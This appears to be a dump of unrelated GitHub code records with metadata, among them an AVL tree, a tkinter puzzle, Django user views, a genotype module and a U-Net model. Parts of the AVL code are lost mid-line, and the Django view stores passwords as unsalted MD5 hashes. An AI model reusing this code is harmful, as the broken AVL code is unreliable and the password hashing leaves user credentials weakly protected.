node1:\n\t\t\t\t\t\tnode2Parent.setRight(node1)\n\t\t\t\t\telse:\n\t\t\t\t\t\tif node1Parent:\n\t\t\t\t\t\t\tif node1Parent.getLeft() is node1:\n\t\t\t\t\t\t\t\tnode1Parent.setLeft(node2)\n\t\t\t\t\t\t\telif node1Parent.getRight() is node1:\n\t\t\t\t\t\t\t\tnode1Parent.setRight(node2)\n\n\t\t\t\t\t\tnode2.setParent(node1Parent)\n\t\t\t\t\t\tnode2.setRight(node1)\n\t\t\t\t\t\tnode2.setLeft(node1Left)\n\t\t\t\t\t\tnode1Left.setParent(node2)\n\n\t\t\t\t\t\tnode1.setLeft(node2Left)\n\t\t\t\t\t\tnode2Left.setParent(node1)\n\t\t\t\t\t\tnode1.setRight(node2Right)\n\t\t\t\t\t\tnode2Right.setParent(node1)\n\n\t\t\t\t\t\tnode1.setParent(node2)\n\n\t\t\t\t\t\tdone = True\n\n\t\tif not done:\n\t\t\tnode1.setParent(node2Parent)\n\t\t\tnode1.setLeft(node2Left)\n\t\t\tnode1.setRight(node2Right)\n\t\t\tnode2Left.setParent(node1)\n\t\t\tnode2Right.setParent(node1)\n\n\t\t\tnode2.setParent(node1Parent)\n\t\t\tnode2.setLeft(node1Left)\n\t\t\tnode2.setRight(node1Right)\n\t\t\tnode1Left.setParent(node2)\n\t\t\tnode1Right.setParent(node2)\n\n\t\tif self.getRoot() is node1:\n\t\t\tself.root = node2\n\t\telif self.getRoot() is node2:\n\t\t\tself.root = node1\n\n\t\tif self.get_First() is node1:\n\t\t\tself.set_First(node2)\n\t\telif self.get_First() is node2:\n\t\t\tself.set_First(node1)\n\n\t\tif self.get_Last() is node1:\n\t\t\tself.set_Last(node2)\n\t\telif self.get_Last() is node2:\n\t\t\tself.set_Last(node1)\n\n\t\tnode1.recomputeSize()\n\t\tnode1.recomputeHeight()\n\t\tnode2.recomputeSize()\n\t\tnode2.recomputeHeight()\n\n\t\"\"\"Re balancing the Tree inplace\n\t\n\t@type nodeToCheckBF: AVLNode\n\t@param nodeToCheckBF: The start node in which we'll start to rebalance the tree up to the root (if needed)\n\t\n\t@rtype: int\n\t@return: number of balancing operations that have been made in order to reBalance the tree\n\t\n\t@Time complexity:\n\tWorst case - maximum route from a node to root is O(h) = O(logn)\n\tIn every node in that route, O(1) work is executed in the worst case (rotation + arithmetic operation)\n\tTotal: O(logn) * O(1) = O(logn) work\n\t\"\"\"\n\tdef reBalance(self, nodeToCheckBF):\n\t\tbalanceOps = 0\n\t\twhile nodeToCheckBF is not None:\n\t\t\tbalanceFactor = nodeToCheckBF.getBalanceFactor()\n\t\t\theight = nodeToCheckBF.getHeight()\n\t\t\tif abs(balanceFactor) == 2:\n\t\t\t\tbalanceOps += self.rotate(nodeToCheckBF, balanceFactor)\n\t\t\t\tnodeToCheckBF = nodeToCheckBF.getParent()\n\t\t\telif abs(balanceFactor) < 2:\n\t\t\t\tnodeToCheckBF.recomputeHeight()\n\t\t\t\tnodeToCheckBF.recomputeSize()\n\t\t\t\tif nodeToCheckBF.getHeight() != height:\n\t\t\t\t\tbalanceOps += 1\n\t\t\tnodeToCheckBF = nodeToCheckBF.getParent()\n\n\n\t\treturn balanceOps\n\n\t\"\"\" Applies the correct rotation to the tree, during rebalance process\n\t \n\t@type BFcriminal: AVLNode\n\t@pre: BFcriminal is not None\n\t@param BFcriminal: a node that its BalanceFactor violating the AVLTreeList balance rules (+2/-2)\n\t\n\t@type balanceFactor: int\n\t@param balanceFactor: the balance factor of BFcriminal\n\t\n\t@rtype: int\n\t@return: number of balancing operations that took place\n\t\"\"\"\n\n\tdef rotate(self, BFcriminal, balanceFactor):\n\t\tbalanceOps = 0\n\t\tif balanceFactor == 2:\n\t\t\tif BFcriminal.getLeft().getBalanceFactor() in [0, 1]:\n\t\t\t\tself.rightRotation(BFcriminal)\n\t\t\t\tbalanceOps += 1\n\t\t\telif BFcriminal.getLeft().getBalanceFactor() == -1:\n\t\t\t\tself.leftThenRightRotation(BFcriminal)\n\t\t\t\tbalanceOps += 2\n\n\t\telif balanceFactor == -2:\n\t\t\tif BFcriminal.getRight().getBalanceFactor() in [-1, 0]:\n\t\t\t\tself.leftRotation(BFcriminal)\n\t\t\t\tbalanceOps += 1\n\t\t\telif BFcriminal.getRight().getBalanceFactor() == 1:\n\t\t\t\tself.rightThenLeftRotation(BFcriminal)\n\t\t\t\tbalanceOps += 2\n\t\treturn balanceOps\n\n\n\t\"\"\"returns the value of the first item in the list\n\n\t@rtype: str\n\t@returns: the value of the first item, None if the list is empty\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef first(self):\n\t\tif self.first_node is not None:\n\t\t\treturn self.first_node.getValue()\n\t\treturn None\n\n\t\"\"\"returns a pointer to the first node\n\t@rtype: AVLNode\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef get_First(self):\n\t\treturn self.first_node\n\n\t\"\"\"sets the first item of the list to a given node\n\t\n\t@param node: a pointer to a AVLNode\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef set_First(self, node):\n\t\tself.first_node = node\n\n\t\"\"\"returns the value of the last item in the list\n\n\t@rtype: str\n\t@returns: the value of the last item, None if the list is empty\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef last(self):\n\t\tif self.last_node is not None:\n\t\t\treturn self.last_node.getValue()\n\t\treturn None\n\n\t\"\"\"return a pointer to the last item in the list\n\t@param node: a pointer to AVLNode\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef get_Last(self):\n\t\treturn self.last_node\n\n\t\"\"\"sets the last item of the list to a given node\n\t\n\t@param node: a pointer to a node\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef set_Last(self, node):\n\t\tself.last_node = node\n\n\n\t\"\"\"returns an array representing list \n\n\t@rtype: list\n\t@returns: a list of strings representing the data structure\n\t\n\tTime Complexity:\n\tInitiliazing an empty list - O(1)\n\tget_First() - returns an attribute of self, without any calculations - O(1)\n\t\n\tConclusion from recitation 3 ex 3 - starting at the minimal element of a tree and calling \n\tn-1 times to successor\n\tis O(n) work since we go through every edge (there are n-1 edges) at most 2 times.\n\tPlus,\n\t\tnode is not None - O(1), n times -> O(n)\n\t\tlst.append(node.getValue()) - O(1), n times -> O(n)\n\t\t\n\tTherefore, the entire while loop takes O(n) time in the worst case.\n\t\"\"\"\n\tdef listToArray(self):\n\t\tlst = []\n\t\tnode = self.get_First()\n\t\twhile node is not None:\n\t\t\tlst.append(node.getValue())\n\t\t\tnode = self.successor(node)\n\t\treturn lst\n\n\t\"\"\"returns the size of the list \n\n\t@rtype: int\n\t@returns: the size of the list\n\t\"\"\"\n\tdef length(self):\n\t\tif not self.empty():\n\t\t\treturn self.root.getSize()\n\t\t# returns 0 if list is empty\n\t\treturn 0\n\n\t\"\"\"returns the successor of a given node\n\t\n\t@pre: node.isRealNode() == True\n\t@type node: AVLNode\n\t@param node: the node of which we will return its successor\n\t@rtype: AVLNode\n\t@returns: The successor of node, None if node is the last element in the list\n\t\n\tTime complexity:\n\tAs we saw in the lecture the time complexity analysis is in the worst case O(h) = O(logn)\n\tIn case that node == self.get_Last() then O(1)\n\t\"\"\"\n\tdef successor(self, node):\n\t\tif node == self.get_Last():\n\t\t\treturn None\n\n\t\tx = node\n\t\tif x.getRight().isRealNode():\n\t\t\treturn self.minimum(x.getRight())\n\t\ty = x.getParent()\n\t\twhile y is not None and x == y.right:\n\t\t\tx = y\n\t\t\ty = x.parent\n\t\treturn y\n\n\t\"\"\"returns the minimum of a given sub tree that node is its root\n\ti.e. the deepest node that is on the `/` branch that starts from node\n\t\n\t@pre: node.isRealNode() == True\n\t@type node: AVLNode\n\t@param node: the node of which we will return the minimum of his subtree\n\t@rtype: AVLNode\n\t@returns: The minimum of node's subtree, if it is a leaf, returns itself\n\t\n\tTime complexity:\n\tminimum = node - O(1)\n\t(*) minimum.getLeft() is not None && minimum = minimum.getLeft() are O(1) each\n\t(*) is executed at most as many times as the height of the tree.\n\tTherefore, the total time complexity is O(h) = O(logn).\n\t\"\"\"\n\tdef minimum(self, node):\n\t\tminNode = node\n\t\twhile minNode.getLeft().isRealNode():\n\t\t\tminNode = minNode.getLeft()\n\t\treturn minNode\n\n\t\"\"\"returns the maximum of a given sub tree that node is its root\n\ti.e. the deepest node that is on the `\\` branch that starts from node\n\n\t@pre: node.isRealNode() == True\n\t@type node: AVLNode\n\t@param node: the node of which we will return the maximum of his subtree\n\t@rtype: AVLNode\n\t@returns: The maximum of node's subtree, if it is a leaf, returns itself\n\n\tTime complexity:\n\tmaximum = node - O(1)\n\t(*) maximum.getRight() is not None && maximum = maximum.getRight() are O(1) each\n\t(*) is executed at most as many times as the height of the tree.\n\tTherefore, the total time complexity is O(h) = O(logn).\n\t\"\"\"\n\tdef maximum(self, node):\n\t\tmaxNode = node\n\t\twhile maxNode.getRight().isRealNode():\n\t\t\tmaxNode = maxNode.getRight()\n\t\treturn maxNode\n\n\t\"\"\"\n\tfind left subtree with height h\n\thelp function for join\n\t@pre - h>=0\n\t@rtype: AVLNode\n\tTime complexity: O(self.getRoot().getHeight()-h)\n\t\"\"\"\n\tdef find_left_subtree_heightH(self, h):\n\t\tif self.getRoot().getHeight() == h:\n\t\t\treturn self.getRoot()\n\t\tnode = self.getRoot()\n\t\thelp = node\n\t\twhile h=0\n\t@rtype: AVLNode\n\tTime complexity: O(self.getRoot().getHeight()-h)\n\t\"\"\"\n\tdef find_right_subtree_heightH(self, h):\n\t\tif self.getRoot().getHeight() == h:\n\t\t\treturn self\n\t\tnode = self.getRoot()\n\t\thelp = node\n\t\twhile h 0\n ]\n\n return creased_edges\n\n\n# --------------------------------------------------------------------------------------------\n\n# module name\n# print(__name__)\n# --------------------------------------------------------------------------------------------\n# Notes\n# --------------------------------------------------------------------------------------------\n","repo_name":"m3trik/tentacle","sub_path":"tentacle/slots/maya/crease.py","file_name":"crease.py","file_ext":"py","file_size_in_byte":10296,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"35"} +{"seq_id":"30609198641","text":"#\n# File containing application logic\n#\n#\n\n# Dependencies\nimport tkinter as tk\nfrom functools import partial\nimport random\n\n# Initialise application class\nclass Application(tk.Frame):\n # Define constructor\n def __init__(self, size, master=None):\n super().__init__(master)\n # Initialise variables\n self.master = master\n self.grid()\n self.size = size\n # Initialise variable to hold position of empty tile\n self.empty = [self.size-1,self.size-1]\n # Initialise array to hold position of each tile\n self.position = []\n for i in range(self.size*self.size-1):\n self.position.append( [int(i/self.size), int(i%self.size)] )\n # Call function to add widgets\n self.create_widgets()\n\n # Function to add widgets\n def create_widgets(self):\n # Initialise array for buttons\n self.button = []\n # Initialise buttons for tiles\n for i in range(self.size*self.size-1):\n # Initialise button\n self.button.append( tk.Button(self, text=str(i), relief=\"sunken\") )\n self.button[i].grid(row = int(i/self.size), column = int(i%self.size), padx = 1, pady = 1)\n self.button[i][\"command\"] = partial(self.swapButton, i)\n\n # Initialise button to shuffle tiles\n self.shuffle = tk.Button(self, text=\"Shuffle\", command=self.shuffle_tiles)\n # Initialise button to reset tiles\n self.reset = tk.Button(self, text=\"Reset\", command=self.reset_tiles)\n # Set position for shuffle and reset buttons\n if self.size%2==0:\n self.shuffle.grid(column=0, row=self.size, columnspan=int(self.size/2))\n self.reset.grid(column=int(self.size/2), row=self.size, columnspan=int(self.size/2))\n else:\n self.shuffle.grid(column=0, row=self.size, columnspan=int(self.size/2))\n self.reset.grid(column=int(self.size/2)+1, row=self.size, columnspan=int(self.size/2))\n\n # Function to swap positions\n def swapPosition(self, pos):\n # Swap positions\n temp = self.position[pos]\n self.position[pos] = self.empty\n self.empty = temp\n\n # Function to move button\n def swapButton(self, pos):\n # Check if button is adjacent to empty tile\n if self.position[pos][0] == self.empty[0] and abs(self.position[pos][1]-self.empty[1]) < 2:\n # Call function to swap positions\n self.swapPosition(pos)\n elif self.position[pos][1] == self.empty[1] and abs(self.position[pos][0]-self.empty[0]) < 2:\n # Call function to swap positions\n self.swapPosition(pos)\n # Call function to refresh display\n self.refresh_display()\n\n # Function to shuffle tiles\n def shuffle_tiles(self):\n # Seed random number generator\n random.seed()\n for count in range(100):\n # Initialise array to hold positions adjacent to empty tile\n temp = []\n # Get list of positions adjacent to empty position\n for i in range(self.size*self.size-1):\n # Check if distance between current tile and empty tile is 1\n if abs(self.position[i][0] - self.empty[0]) + abs(self.position[i][1] - self.empty[1]) == 1:\n # Append position to array\n temp.append(i)\n # Select a random position from array\n randpos = temp[ random.randint(0, len(temp)-1) ]\n self.swapPosition(randpos)\n # Call function to update display\n self.refresh_display()\n\n # Function to reset tiles\n def reset_tiles(self):\n # Set tile positions to original value\n for i in range(self.size*self.size-1):\n self.position[i] = [int(i/self.size), int(i%self.size)]\n # Set empty tile to original position\n self.empty = [self.size-1,self.size-1]\n # Call function to update display\n self.refresh_display()\n\n # Function to refresh display\n def refresh_display(self):\n # Iterate over buttons\n for i in range(self.size*self.size-1):\n self.button[i].grid(row = self.position[i][0], column = self.position[i][1])\n","repo_name":"NithishRaja/sliding_puzzle","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14158974394","text":"#ringid = int(input('Sisestage ringide arv: '))\r\n#\r\n#porgandid = 0\r\n#i = 0\r\n#\r\n#for mitu_paaris_ringi_on in range(ringid):\r\n# if mitu_paaris_ringi_on % 2 == 0:\r\n# i += 1\r\n# porgandid += 2\r\n# \r\n#if ringid%2 != 0:\r\n# porgandid -= 2\r\n# \r\n#porgandid2 = porgandid * i\r\n#\r\n#print('Porgandite koguarv on ' + str(porgandid2) + \".\")\r\n\r\n\r\nfail = open(\"rebased.txt\", encoding=\"UTF-8\")\r\n\r\naasta = int(input('Palun sisestage, millise aasta andmeid vajate: '))\r\n\r\nvastuvõetud = []\r\n\r\nfor rida in fail:\r\n vastuvõetud.append(int(rida))\r\nfail.close()\r\n\r\nfor j in range(len(vastuvõetud)):\r\n if j + 2011 == aasta:\r\n print(str(aasta) + '. aastal oli vastuvõetuid ' + str(vastuvõetud[j]))\r\n ","repo_name":"saskia002/Proge-testid","sub_path":"Py/proge UT/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"et","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35319953544","text":"import hashlib\nimport json\nimport re\nimport time\nimport jwt\nimport random\n\nfrom django.http import JsonResponse\nfrom django.utils.decorators import method_decorator\nfrom django.views import View\nfrom django.conf import settings\nfrom django.core.cache import cache\n\n# Create your views here.\nfrom user.models import UserProfile\nfrom tools.login_dec import login_check\nfrom tools.sms import YunTongXin\nfrom .tasks import task_test\n\nclass UserView(View):\n def get(self, request, username):\n if username:\n # 返回某个用户信息\n try:\n user = UserProfile.objects.get(username=username)\n except:\n result = {'code': 10103, 'error': '用户不存在'}\n return JsonResponse(result)\n keys = request.GET.keys()\n if keys:\n data = {}\n for k in keys:\n if k == 'password':\n continue\n if hasattr(user, k):\n data[k] = getattr(user, k)\n result = {'code': 200, 'username': user.username,\n 'data': data}\n else:\n result = {'code': 200, 'username': user.username,\n 'data': {'info': user.info,\n 'sign': user.sign,\n 'nickname': user.nikename,\n # str返回路径信息\n 'avatar': str(user.avatar)}}\n return JsonResponse(result)\n\n def post(self, request):\n # 1获取json字符串\n json_str = request.body\n # 2反序列化\n py_obj = json.loads(json_str)\n # 获取每个数据\n username = py_obj['username']\n email = py_obj['email']\n phone = py_obj['phone']\n password_1 = py_obj['password_1']\n password_2 = py_obj['password_2']\n sms_num=py_obj['sms_num']\n # 效验逻辑问题\n # 用户名为空\n if not username:\n result = {'code': 10001, 'error': '用户名为空'}\n return JsonResponse(result)\n # 验证密码一致\n if password_1 != password_2:\n result = {'code': 10002, 'error': '两次密码不一致'}\n return JsonResponse(result)\n #验证码比较\n #从redis中获取验证吗\n cache_key = 'sms_%s' % phone\n code=str(cache.get(cache_key))\n print(code)\n #对比两个验证码\n if sms_num!=code:\n result={'code':10015,'error':'验证码错误'}\n return JsonResponse(result)\n\n # 用ma5加密密码\n password = hashlib.md5(password_1.encode()).hexdigest()\n # 添加进入数据库\n try:\n UserProfile.objects.create(username=username,\n email=email,\n phone=phone,\n password=password)\n except:\n reslut = {'code': 10003, 'error': '用户名重复'}\n return JsonResponse(reslut)\n # 注册成功生产token\n token = make_token(username)\n token = token.decode()\n return JsonResponse({'code': 200,\n 'username': username,\n 'data': {'token': token}})\n\n # 函数装饰器转换成方法装饰器\n @method_decorator(login_check)\n def put(self, request, username):\n # 1获取json字符串\n json_str = request.body\n # 2反序列化\n py_obj = json.loads(json_str)\n # 获取user对象\n user = request.myuser\n # 获取每个数据\n user.nikename = py_obj['nickname']\n user.sign = py_obj['sign']\n user.info = py_obj['info']\n # 5.保存save\n user.save()\n result = {'code': 200}\n return JsonResponse(result)\n\n\ndef make_token(username, exp=3600 * 24):\n key = settings.JWT_TOKEN_KEY\n now = time.time()\n payload = {'username': username,\n 'exp': now + exp}\n return jwt.encode(payload, key)\n\n\n@login_check\ndef user_avatar(request, username):\n if request.method != 'POST':\n return JsonResponse({'code': 10130, 'error': '请求方式必须是post'})\n # 修改用户头像\n # 1,查2,改3,上传(改数据库可能不成功,应该try)\n # 验证token\n user = request.myuser\n user.avatar = request.FILES['avatar']\n user.save()\n result = {'code': 200}\n return JsonResponse(result)\n\n\ndef sms_view(request):\n json_str = request.body;\n py_obj = json.loads(json_str)\n # 获取手机号,正则表达式验证\n phone = py_obj['phone']\n if is_phone(phone):\n # 缓存验证码\n # 生成键\n cache_key = 'sms_%s' % phone\n # 生成验证码\n code = random.randint(1000, 9999)\n #将验证码写入到redis中\n cache.set(cache_key,code,65)\n # 发送短信验证请求(同步)\n # x = YunTongXin(settings.SMS_ACCOUNT_ID,\n # settings.SMS_ACCOUNT_TOKEN,\n # settings.SMS_APP_ID,\n # settings.SMS_TEMPLATE_ID)\n # 应该try或者完善sms报错情况\n # res = x.run(phone, code)\n # 发送短信验证请求(异步)\n task_test.delay(phone,code)\n result = {'code': 200, }\n return JsonResponse(result)\n else:\n result = {'code': 10011, 'error': '请输入正确手机格式'}\n return JsonResponse(result)\n\n\n# 手机号是否正确\ndef is_phone(phone):\n phone_pat = re.compile('^(13\\d|14[5|7]|15\\d|166|17[3|6|7]|18\\d)\\d{8}$')\n res = re.search(phone_pat, phone)\n if not res:\n return False\n return True\n","repo_name":"snailwjiang/blog","sub_path":"blog/user/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7646575968","text":"\"\"\"\n1. board의 요소를 list형태로 변환하기\n-> str은 str[0] = 'a'이런식으로 변환이 안되기 때문에 list형태로 변경\n\n2. board에서 2x2로 붙어있는 블럭 위치를 tmp에 저장하기\n\n3. tmp에 저장한 위치로 2x2 블럭위치를 공백으로 변경\n※ 만약 tmp가 비어있다면 없어지는 블럭이 없기에 break\n\n4. tmp안에 있는 모든 요소 삭제\n\n5. board에 공백부분을 채우기\n1) for문을 거꾸로해서 돌려서 밑에부터 공백을 채워나갈 거임 \n2) 현재 위치가 공백일 경우\n3) 1칸식 위로 가서 공백이 아닌 곳을 찾으면 그 값을 현재 위치에 저장\n\n6. 공백의 개수를 return 하기\n\"\"\"\n\ndef solution(m, n, board):\n answer = 0\n tmp = []\n \n for i in range(m):\n board[i] = list(board[i])\n \n while True:\n for i in range(m-1):\n for j in range(n-1):\n if board[i][j] != ' ':\n if board[i][j] == board[i][j+1] == board[i+1][j] == board[i+1][j+1]:\n tmp.append((i, j))\n \n if not tmp:\n break\n \n for i, j in tmp:\n board[i][j] = ' '\n board[i][j+1] = ' '\n board[i+1][j] = ' '\n board[i+1][j+1] = ' '\n \n tmp.clear()\n \n for i in range(m-1, 0, -1):\n for j in range(n):\n if board[i][j] == ' ':\n num = i - 1\n while num >= 0:\n if board[num][j] != ' ':\n board[i][j] = board[num][j]\n board[num][j] = ' '\n break\n num -= 1\n \n for i in board:\n answer += i.count(' ')\n \n return answer","repo_name":"guswnsakvk/Algorithm","sub_path":"programmers/2018_KAKAO_프렌즈4블록.py","file_name":"2018_KAKAO_프렌즈4블록.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8397252748","text":"\"\"\"Genotype module.\"\"\"\nimport sys\nimport scipy.stats\n\n\nclass Genotype(list):\n \"\"\"A Genotype object.\"\"\"\n\n def __init__(self, nref, nalt):\n \"\"\"\n Genotype object.\n\n nref is the amount of evidence supporting the reference allele,\n nalt is the evidence supporting an alternative allele.\n\n >>> Genotype(13750, 5257).genotype\n 'homozygous'\n \"\"\"\n self.nref = nref\n self.nalt = nalt\n self.genotype_likelihood()\n\n @property\n def reference(self):\n \"\"\"Return p-value decribing the probability that the genotype is reference.\"\"\"\n if len(self) == 3:\n return self[0]\n\n @property\n def heterozygous(self):\n \"\"\"Return p-value decribing the probability that the genotype is heterozygous.\"\"\"\n if len(self) == 3:\n return self[1]\n\n @property\n def homozygous(self):\n \"\"\"Return p-value decribing the probability that the genotype is homozygous.\"\"\"\n if len(self) == 3:\n return self[2]\n\n def genotype_likelihood(self):\n r\"\"\"\n Calculate genotype likelihood.\n\n P(g|D) = P(g)P(D\\g)/sum(P(g)P(D|g')) where P(D|g) = Pbin(Nalt, Nalt + Nfef)\n :return:\n \"\"\"\n reference = 0.03\n heterozygous = 0.5\n homozygous = 0.97\n genotypes = [reference, heterozygous, homozygous]\n priors = [0.9, 0.05, 0.05]\n nref = self.nref\n nalt = self.nalt\n pdg = {}\n for g, prior in zip(genotypes, priors):\n # data likelihood P(D\\g)\n pbin = scipy.stats.binom_test(nalt, nref + nalt, g, alternative='two-sided')\n pdg[g] = pbin * prior\n regularization = sum([pbinp for pbinp in pdg.values()])\n if regularization == 0:\n # This can happen if regularization is rounded to 0\n regularization += sys.float_info.min\n posterior = {g: p / regularization for g, p in pdg.items()}\n self.append(posterior[reference])\n self.append(posterior[heterozygous])\n self.append(posterior[homozygous])\n genotype_p = max([self.reference, self.heterozygous, self.homozygous])\n if genotype_p == self.homozygous:\n genotype = 'homozygous'\n elif genotype_p == self.heterozygous:\n genotype = 'heterozygous'\n elif genotype_p == self.reference:\n genotype = 'reference'\n self.genotype = genotype\n","repo_name":"bardin-lab/readtagger","sub_path":"readtagger/genotype.py","file_name":"genotype.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"7347049854","text":"import unittest\n\nfrom should_dsl import should\n\nfrom Controller.Classe_Comunicacao import *\n\n\n\nclass Teste_Comunicacao(unittest.TestCase):\n\n\n def teste_ler_serial_tipo_saida(self):\n s = Classe_Comunicacao()\n leitura = s.ler_serial()\n leitura |should| be_kind_of(str)\n\n def teste_ler_serial_verifica_integridade(self):\n s = Classe_Comunicacao()\n leitura = s.ler_serial()\n leitura |should| be_like(r'^ID:[123]+,angulo:[0-9]+.[0-9]+,temperatura:[0-9]+.[0-9]+,tempo:[0-9]+.[0-9]+[|]ID:[123]+,angulo:[0-9]+.[0-9]+,temperatura:[0-9]+.[0-9]+,tempo:[0-9]+.[0-9]+[|]ID:[123]+,angulo:[0-9]+.[0-9]+,temperatura:[0-9]+.[0-9]+,tempo:[0-9]+.[0-9]+$')\n\n def teste_formatar_pacote(self):\n s = Classe_Comunicacao()\n pacote = s.formatar_pacote(s.ler_serial())\n pacote |should| be_kind_of(list)\n\n for dicionario in pacote:\n dicionario |should| be_kind_of(dict)\n\n def teste_obter_brutos(self):\n s = Classe_Comunicacao()\n retorno = s.obter_dados_brutos()\n retorno |should| be_kind_of(list)","repo_name":"RonaldLopes/tdd","sub_path":"Testes/TesteClasse_Comunicacao.py","file_name":"TesteClasse_Comunicacao.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"2726587368","text":"#Использование цикла While\nthislist = [\"apple\", \"banana\", \"cherry\"]\ni = 0\nwhile i < len(thislist):\n print(thislist[i])\n i = i + 1#Не забываем увеличивать индекс на 1 после каждой итерации.\n \n#Используем функцию len(), чтобы определить длину списка, \n# затем начинаем с 0 и зацикливаемся на элементах списка, ссылаясь на их индексы.\n\n","repo_name":"Firuza25/PP2F","sub_path":"week2/Lists/32.py","file_name":"32.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"11389676003","text":"\"\"\"\nID: mehvix1\nLANG: PYTHON3\nTASK: guess\n\nFeb 05, 2020\n\"\"\"\n\n\ndef count(lst, item):\n count = 0\n new_lst = []\n for i in lst:\n if i == item:\n count += 1\n else:\n new_lst.append(i)\n\n print([new_lst, count])\n return [new_lst, count]\n\n\nfin = open('guess.in', 'r')\nfout = open('guess.out', 'w')\n\nlst = []\nfor _ in range(int(fin.readline())):\n lst.append(fin.readline().split()[2:])\n\n# flatten\nflat = []\nfor i in lst:\n for j in i:\n flat.append(j)\n\n# max occurring\nmax_shared = 1\nwhile flat:\n flat, shared = count(flat, flat[0])\n if shared > max_shared:\n max_shared = shared\n\nprint(max_shared)\nfinal = max_shared\nfout.write(str(final) + '\\n')\nfout.close()\n","repo_name":"Mehvix/competitive-programming","sub_path":"USACO/2018-2019/January/Bronze/3-guess/3-guess.py","file_name":"3-guess.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"37827270347","text":"default_max_speed = 30\ndefault_number_of_lanes = 1\ndefault_max_acceleration = 5\ndefault_max_deceleration = 5\ndefault_time_of_reaction = 1\n\nnumber_of_vertical_blocks = 10\nnumber_of_horizontal_blocks = 10\nblock_size = 100\n\ndefault_a_b_time = 100\ndefault_b_a_time = 100\ndefault_lag_time = 10\n","repo_name":"gabmis/cf","sub_path":"src/tools/parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14503125044","text":"class Vehicle:\n def __init__(self, vehicle_color):\n self.vehicle_color = vehicle_color\n self.speed = 0\n\n def go(self, speed):\n self.speed = speed\n print(f'now going at speed {speed}')\n\n def __str__(self):\n return f'''\nVehicle Color: {self.vehicle_color} \nVehicle Speed: {self.speed}\n '''\n\n\nclass Plane(Vehicle):\n\n def go(self, speed):\n self.speed = speed\n print(f'now flying at speed {speed}')\n\n\nv1 = Vehicle('red')\nv1.go(50)\nprint(v1)\n\np1 = Plane('yellow')\np1.go(250)\nprint(p1)\n","repo_name":"MiriamKaplun/PCS-Homework","sub_path":"Python/47/hw47.py","file_name":"hw47.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72899681701","text":"\"\"\"\n@author: Duy Le \n\"\"\"\nfrom pytorch_toolbelt.modules.dsconv import DepthwiseSeparableConv2d\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.data\nimport torch\nfrom pytorch_toolbelt.inference.functional import pad_image_tensor, unpad_image_tensor\nfrom pytorch_toolbelt.modules.encoders.timm.efficient_net import make_n_channel_input_conv2d_same\n\nimport timm\nfrom timm.models.efficientnet_blocks import DepthwiseSeparableConv, InvertedResidual\n# import sys\n# sys.path.append('..')\nfrom .modules import *\nfrom .model_util import init_weights, get_lr_parameters\n\n__all__ = [\n 'Attention_Unet', \n 'Unet_Encoder',\n 'resnet50_attunet', \n 'efficientnetb2_attunet', \n 'mobilenetv3_attunet',\n 'swin_tiny_attunet'\n]\n\nclass Unet_Encoder(nn.Module):\n def __init__(self, freeze_bn=True, backbone: str ='resnext50d_32x4d', freeze_backbone=False, pretrained=True):\n super(Unet_Encoder, self).__init__()\n if pretrained:\n if backbone.startswith('swin'):\n from .modules.swin_transformer import create_model\n # pretrained_model = timm.create_model(backbone, pretrained=False, num_classes=1)\n # pretrained_model.load_state_dict(torch.load('models/IDRiD/pretrained_models/model.bin'))\n \n # pretrained_dict = pretrained_model.state_dict()\n # encoder_dict = self.encoder.state_dict()\n # pretrained_dict = {k: v for k, v in pretrained_dict.items() if k in encoder_dict}\n\n # encoder_dict.update(pretrained_dict) \n\n # self.encoder.load_state_dict(pretrained_dict)\n self.encoder = create_model(backbone)\n self.filters = self.encoder.num_features\n else:\n self.encoder = timm.create_model(backbone, features_only=True, pretrained=pretrained)\n self.filters = self.encoder.feature_info.channels()\n if freeze_bn:\n self.freeze_bn()\n if freeze_backbone:\n for param in self.encoder.parameters():\n param.requires_grad = False\n else:\n if backbone.startswith('swin'):\n from .modules.swin_transformer import create_model\n self.encoder = create_model(backbone, pretrained=False)\n self.filters = self.encoder.num_features\n else:\n self.encoder = timm.create_model(backbone, features_only=True, pretrained=False)\n self.filters = self.encoder.feature_info.channels()\n init_weights(self)\n\n def change_input_channels(self, input_channels: int, mode=\"auto\", **kwargs):\n self.encoder.conv_stem = make_n_channel_input_conv2d_same(\n self.encoder.conv_stem, input_channels, mode, **kwargs\n )\n return self\n\n def freeze_bn(self):\n for module in self.modules():\n if isinstance(module, nn.BatchNorm2d):\n module.eval()\n\n def forward(self, input):\n encoder_features = self.encoder(input)\n return encoder_features\n\n\nclass EfficientUnetBlock(nn.Module):\n def __init__(self, in_channels: int, out_channels: int, activation=Swish, drop_block_rate=0.0):\n super().__init__()\n self.ir = 